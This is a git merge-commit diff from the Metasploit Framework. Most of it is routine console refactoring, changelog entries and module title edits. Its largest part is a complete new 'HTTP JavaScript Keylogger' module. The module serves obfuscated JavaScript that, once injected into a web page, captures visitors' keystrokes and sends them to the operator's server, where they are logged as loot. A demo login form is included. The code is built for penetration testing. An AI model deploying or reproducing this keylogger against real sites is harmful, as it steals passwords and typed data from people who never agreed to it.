Merge branch 'master' of github.com:rapid7/metasploit-framework

unstable
sinn3r 2012-02-21 11:50:05 -06:00
commit a288742376
17 changed files with 422 additions and 77 deletions

Binary file not shown.

View File

@ -1,6 +1,14 @@
Armitage Changelog
==================
21 Feb 12
---------
- Added Cut/Copy/Paste menu to table cell editor.
- Module browser search field now treats spaces as a wildcard. You may type:
"win meterp" and Armitage will treat it as "win*meterp"
- Hovering over an edge in graph view no longer reports a "null" tooltip
- Fixed parsing of ps output for the process dialog (it's much much better now)
14 Feb 12
---------
- Added ports 5631 (pc anywhere) and 902 (vmauthd) to the MSF Scans feature.

View File

@ -28,7 +28,6 @@ class Db
#
def commands
base = {
"db_driver" => "Specify a database driver",
"db_connect" => "Connect to an existing database",
"db_disconnect" => "Disconnect from the current database instance",
"db_status" => "Show the current database status",
@ -1262,44 +1261,6 @@ class Db
end
end
def cmd_db_driver(*args)
if(args[0])
if(args[0] == "-h" || args[0] == "--help")
print_status("Usage: db_driver [driver-name]")
return
end
if(framework.db.drivers.include?(args[0]))
framework.db.driver = args[0]
print_status("Using database driver #{args[0]}")
else
print_error("Invalid driver specified")
end
return
end
if(framework.db.driver)
print_status(" Active Driver: #{framework.db.driver}")
else
print_status("No Active Driver")
end
print_status(" Available: #{framework.db.drivers.join(", ")}")
print_line("")
if ! framework.db.drivers.include?('postgresql')
print_status(" DB Support: Enable the postgresql driver with the following command:")
print_status(" * This requires libpq-dev and a build environment")
print_status(" $ gem install postgres")
print_status(" $ gem install pg # is an alternative that may work")
print_line("")
end
end
def cmd_db_driver_tabs(str, words)
return framework.db.drivers
end
def cmd_db_connect_help
# Help is specific to each driver
cmd_db_connect("-h")

View File

@ -109,7 +109,7 @@ class Console::CommandDispatcher::Core
# Performs operations on the supplied channel.
#
def cmd_channel(*args)
if args.include?("-h") or args.include?("--help")
if args.empty? or args.include?("-h") or args.include?("--help")
cmd_channel_help
return
end
@ -180,14 +180,35 @@ class Console::CommandDispatcher::Core
end
end
def cmd_channel_tabs(str, words)
case words.length
when 1
@@channel_opts.fmt.keys
when 2
case words[1]
when "-c", "-i", "-r", "-w"
tab_complete_channels
else
[]
end
else
[]
end
end
def cmd_close_help
print_line "Usage: close <channel_id>"
print_line
print_line "Closes the supplied channel."
print_line
end
#
# Closes a supplied channel.
#
def cmd_close(*args)
if (args.length == 0)
print_line(
"Usage: close channel_id\n\n" +
"Closes the supplied channel.")
cmd_close_help
return true
end
@ -204,6 +225,12 @@ class Console::CommandDispatcher::Core
end
end
def cmd_close_tabs(str, words)
return [] if words.length > 1
return tab_complete_channels
end
#
# Terminates the meterpreter session.
#
@ -216,6 +243,17 @@ class Console::CommandDispatcher::Core
alias cmd_quit cmd_exit
def cmd_detach_help
print_line "Detach from the victim. Only possible for non-stream sessions (http/https)"
print_line
print_line "The victim will continue to attempt to call back to the handler until it"
print_line "successfully connects (which may happen immediately if you have a handler"
print_line "running in the background), or reaches its expiration."
print_line
print_line "This session may #{client.passive_service ? "" : "NOT"} be detached."
print_line
end
#
# Disconnects the session
#
@ -228,14 +266,19 @@ class Console::CommandDispatcher::Core
shell.stop
end
def cmd_interact_help
print_line "Usage: interact <channel_id>"
print_line
print_line "Interacts with the supplied channel."
print_line
end
#
# Interacts with a channel.
#
def cmd_interact(*args)
if (args.length == 0)
print_line(
"Usage: interact channel_id\n\n" +
"Interacts with the supplied channel.")
cmd_info_help
return true
end
@ -251,6 +294,8 @@ class Console::CommandDispatcher::Core
end
end
alias cmd_interact_tabs cmd_close_tabs
#
# Runs the IRB scripting shell
#
@ -261,15 +306,20 @@ class Console::CommandDispatcher::Core
Rex::Ui::Text::IrbShell.new(binding).run
end
def cmd_migrate_help
print_line "Usage: migrate <pid>"
print_line
print_line "Migrates the server instance to another process."
print_line "NOTE: Any open channels or other dynamic state will be lost."
print_line
end
#
# Migrates the server to the supplied process identifier.
#
def cmd_migrate(*args)
if (args.length == 0)
print_line(
"Usage: migrate pid\n\n" +
"Migrates the server instance to another process.\n" +
"Note: Any open channels or other dynamic state will be lost.")
cmd_migrate_help
return true
end
@ -371,14 +421,19 @@ class Console::CommandDispatcher::Core
alias cmd_use_help cmd_load_help
alias cmd_use_tabs cmd_load_tabs
def cmd_read_help
print_line "Usage: read <channel_id> [length]"
print_line
print_line "Reads data from the supplied channel."
print_line
end
#
# Reads data from a channel.
#
def cmd_read(*args)
if (args.length == 0)
print_line(
"Usage: read channel_id [length]\n\n" +
"Reads data from the supplied channel.")
cmd_read_help
return true
end
@ -402,6 +457,8 @@ class Console::CommandDispatcher::Core
return true
end
alias cmd_read_tabs cmd_close_tabs
def cmd_run_help
print_line "Usage: run <script> [arguments]"
print_line
@ -669,17 +726,15 @@ class Console::CommandDispatcher::Core
return true
end
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
def cmd_resource_help
print_line "Usage: resource <path1> [path2 ...]"
print_line
print_line "Run the commands stored in the supplied files."
print_line
end
def cmd_resource(*args)
if args.empty?
print(
"Usage: resource path1 path2" +
"Run the commands stored in the supplied files.\n")
return false
end
args.each do |glob|
@ -710,6 +765,12 @@ class Console::CommandDispatcher::Core
end
end
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
end
def cmd_enable_unicode_encoding
client.encode_unicode = true
print_status("Unicode encoding is enabled")
@ -799,6 +860,10 @@ protected
tabs.compact
end
def tab_complete_channels
client.channels.keys.map { |k| k.to_s }
end
end
end

View File

@ -0,0 +1,311 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Capture: HTTP JavaScript Keylogger',
'Description' => %q{
This modules runs a web server that demonstrates keystroke
logging through JavaScript. The DEMO option can be set to enable
a page that demonstrates this technique. Future improvements will
allow for a configurable template to be used with this module.
To use this module with an existing web page, simply add a
script source tag pointing to the URL of this service ending
in the .js extension. For example, if URIPATH is set to "test",
the following URL will load this script into the calling site.
http://server:port/test/anything.js
},
'License' => MSF_LICENSE,
'Author' => ['Marcus J. Carey <mjc[at]threatagent.com>', 'hdm'],
))
register_options(
[
OptBool.new('DEMO', [true, "Creates HTML for demo purposes", false]),
], self.class)
end
# This is the module's main runtime method
def run
@seed = Rex::Text.rand_text_alpha(12)
@client_cache = {}
# Starts Web Server
exploit
end
# This handles the HTTP responses for the Web server
def on_request_uri(cli, request)
cid = nil
if request['Cookie'].to_s =~ /,?\s*id=([a-f0-9]{4,32})/i
cid = $1
end
if not cid and request.qstring['id'].to_s =~ /^([a-f0-9]{4,32})/i
cid = $1
end
data = request.qstring['data']
unless cid
cid = generate_client_id(cli,request)
print_status("#{cli.peerhost} Assigning client identifier '#{cid}'")
resp = create_response(302, 'Moved')
resp['Content-Type'] = 'text/html'
resp['Location'] = request.uri + '?id=' + cid
resp['Set-Cookie'] = "id=#{cid}"
cli.send_response(resp)
return
end
base_url = generate_base_url(cli, request)
# print_status("#{cli.peerhost} [#{cid}] Incoming #{request.method} request for #{request.uri}")
case request.uri
when /\.js(\?|$)/
content_type = "text/plain"
send_response(cli, generate_keylogger_js(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
when /\/demo\/?(\?|$)/
if datastore['DEMO']
content_type = "text/html"
send_response(cli, generate_demo(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
else
send_not_found(cli)
end
else
if data
nice = process_data(cli, request, cid, data)
script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : ""
send_response(cli, script, {'Content-Type' => "text/plain", 'Set-Cookie' => "id=#{cid}"})
else
if datastore['DEMO']
send_redirect(cli, "/demo/?cid=#{cid}")
else
send_not_found(cli)
end
end
end
end
# Figure out what our base URL is based on the user submitted
# Host header or the address of the client.
def generate_base_url(cli, req)
port = nil
host = Rex::Socket.source_address(cli.peerhost)
if req['Host']
host = req['Host']
bits = host.split(':')
# Extract the hostname:port sequence from the Host header
if bits.length > 1 and bits.last.to_i > 0
port = bits.pop.to_i
host = bits.join(':')
end
else
port = datastore['SRVPORT'].to_i
end
prot = (!! datastore['SSL']) ? 'https://' : 'http://'
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
base = prot + host
if not ((prot == 'https' and port.nil?) or (prot == 'http' and port.nil?))
base << ":#{port}"
end
base << get_resource
end
def process_data(cli, request, cid, data)
lines = [""]
real = ""
Rex::Text.uri_decode(data).split(",").each do |char|
byte = char.to_s.hex.chr
next if byte == "\x00"
real << byte
case char.to_i
# Do Backspace
when 8
lines[-1] = lines[-1][0, lines[-1].length - 1] if lines[-1].length > 0
when 13
lines << ""
else
lines[-1] << byte
end
end
nice = lines.join("<CR>").gsub("\t", "<TAB>")
real = real.gsub("\x08", "<DEL>")
if not @client_cache[cid]
fp = fingerprint_user_agent(request['User-Agent'] || "")
header = "Browser Keystroke Log\n"
header << "=====================\n"
header << "Created: #{Time.now.to_s}\n"
header << "Address: #{cli.peerhost}\n"
header << " ID: #{cid}\n"
header << " FPrint: #{fp.inspect}\n"
header << " URL: #{request.uri}\n"
header << "\n"
header << "====================\n\n"
@client_cache[cid] = {
:created => Time.now.to_i,
:path_clean => store_loot("browser.keystrokes.clean", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Clean)"),
:path_raw => store_loot("browser.keystrokes.raw", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Raw)")
}
print_good("#{cli.peerhost} [#{cid}] Logging clean keystrokes to: #{@client_cache[cid][:path_clean]}")
print_good("#{cli.peerhost} [#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
end
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
if nice.length > 0
print_good("#{cli.peerhost} [#{cid}] Keys: #{nice}")
end
nice
end
def generate_client_id(cli, req)
"%.8x" % Kernel.rand(0x100000000)
end
def generate_demo(base_url, cid)
# This is the Demo Form Page <HTML>
html = <<EOS
<html>
<head>
<title>Demo Form</title>
<script type="text/javascript" src="#{base_url}/#{@seed}.js?id=#{cid}"></script>
</head>
<body bgcolor="white">
<br><br>
<div align="center">
<h1>Keylogger Demo Form</h1>
<form method=\"POST\" name=\"logonf\" action=\"#{base_url}/demo/?id=#{cid}\">
<p><font color="red"><i>This form submits data to the Metasploit listener for demonstration purposes.</i></font>
<br><br>
<table border="0" cellspacing="0" cellpadding="0">
<tr><td>Username:</td> <td><input name="username" size="20"></td> </tr>
<tr><td>Password:</td> <td><input type="password" name="password" size="20"></td> </tr>
</table>
<p align="center"><input type="submit" value="Submit"></p></form>
<br/>
<textarea cols="80" rows="5" id="results">
</textarea>
</div>
</body>
</html>
EOS
return html
end
# This is the JavaScript Key Logger Code
def generate_keylogger_js(base_url, cid)
targ = Rex::Text.rand_text_alpha(12)
code = <<EOS
var c#{@seed} = 0;
window.onload = function load#{@seed}(){
l#{@seed} = ",";
if (window.addEventListener) {
document.addEventListener('keypress', p#{@seed}, true);
document.addEventListener('keydown', d#{@seed}, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', p#{@seed});
document.attachEvent('onkeydown', d#{@seed});
} else {
document.onkeypress = p#{@seed};
document.onkeydown = d#{@seed};
}
}
function p#{@seed}(e){
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
k#{@seed} = k#{@seed}.toString(16);
if (k#{@seed} != "d"){
#{@seed}(k#{@seed});
}
}
function d#{@seed}(e){
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
if (k#{@seed} == 9 || k#{@seed} == 8 || k#{@seed} == 13){
#{@seed}(k#{@seed});
}
}
function #{@seed}(k#{@seed}){
l#{@seed} = l#{@seed} + k#{@seed} + ",";
var t#{@seed} = "#{targ}" + c#{@seed};
c#{@seed}++;
var f#{@seed};
if (document.all)
f#{@seed} = document.createElement("<script name='" + t#{@seed} + "' id='" + t#{@seed} + "'></script>");
else {
f#{@seed} = document.createElement("script");
f#{@seed}.setAttribute("id", t#{@seed});
f#{@seed}.setAttribute("name", t#{@seed});
}
f#{@seed}.setAttribute("src", "#{base_url}?id=#{cid}&data=" + l#{@seed});
f#{@seed}.style.visibility = "hidden";
document.body.appendChild(f#{@seed});
if (k#{@seed} == 13 || l#{@seed}.length > 3000)
l#{@seed} = ",";
setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000);
}
EOS
return code
end
def generate_demo_js_reply(base_url, cid, data)
code = <<EOS
try {
document.getElementById("results").value = "Keystrokes: #{data}";
} catch(e) { }
EOS
return code
end
end

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => 'PmWiki <= 2.2.34 (pagelist) Remote PHP Code Execution',
'Name' => 'PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
'Name' => 'vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the 'proc_deutf()' function
defined in /includes/functions_vbseocp_abstract.php. User input passed through

View File

@ -24,14 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free',
'Description' => %q{
This module exploits a use-after-free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). Mac OS X version by argp,
tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,
10.6.8, 10.7.2 and 10.7.3.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
a m3u playlist with a long track name, a SEH exception record can be overwritten

View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
'Name' => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Free MP3 CD
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.

View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
'Name' => 'Serv-U FTP Server < 4.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'StreamDown 6.8.0 Buffer overflow',
'Name' => 'StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception

View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Wireshark console.lua pre-loading vulnerability",
'Name' => "Wireshark console.lua Pre-Loading Script Execution",
'Description' => %q{
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
@ -335,4 +335,4 @@ But on a fully patched XP SP3, the same URI format will not work. Windows will t
the share via SMB, and the victim will not see the share. In this case, you should specify
the URI to like this:
http://192.168.1.11/files
=end
=end

View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather RazorSQL credentials',
'Name' => 'Windows Gather RazorSQL Credentials',
'Description' => %q{
This module stores username, password, type, host, port, database (and name)
collected from profiles.txt of RazorSQL.
@ -154,4 +154,4 @@ end
=begin
http://www.razorsql.com/download.html
Tested on: v5.6.2 (win32)
=end
=end

View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Disconnect Wireless Connection ',
'Name' => 'Windows Disconnect Wireless Connection',
'Description' => %q{
This module disconnects the current wireless network connection
on the specified interface.